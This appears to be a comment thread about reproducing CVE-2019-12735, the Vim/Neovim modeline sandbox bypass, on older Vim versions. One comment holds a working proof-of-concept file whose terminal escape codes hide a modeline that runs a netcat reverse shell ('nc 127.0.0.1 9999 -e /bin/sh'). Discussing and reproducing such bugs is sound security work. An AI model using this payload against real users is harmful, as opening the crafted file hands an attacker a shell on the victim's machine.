Hi,

I realize that function assert_fails is added in version 8, does that mean vim74 is not affected by this vulnerability, or how could I construct poc on vim74?

Thanks

Try replacing assert_fails() with execute(). The sandbox bypass is based on the :source! command. assert_fails() and execute() are just ways to run it.

Is it true?

^[[?7l^[SNothing here.^[:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=execute('set\ fde=x\ \ |\ source\!\ \%') fdl=0: ^V^[[1G^V^[[KNothing here."^V^[[D

Ah, my bad. Actually, execute() also isn't implemented back in 7.4, so this won't work either. Off the top of my head, I can't give you can example how to make the poc compatible with 7.4, but there likely is some way.

So how do I reproduce this bug in vim72?

I also could not produce this issue in version 7.4.1689. If anyone can re-produce this for this version then please let me know.

PS: I could make it work on NVIM v0.3.5-11-g1060bfd03.

let check it out

• https://blog.cloud365.vn/cve-2019-12735/CVE_2019-12735/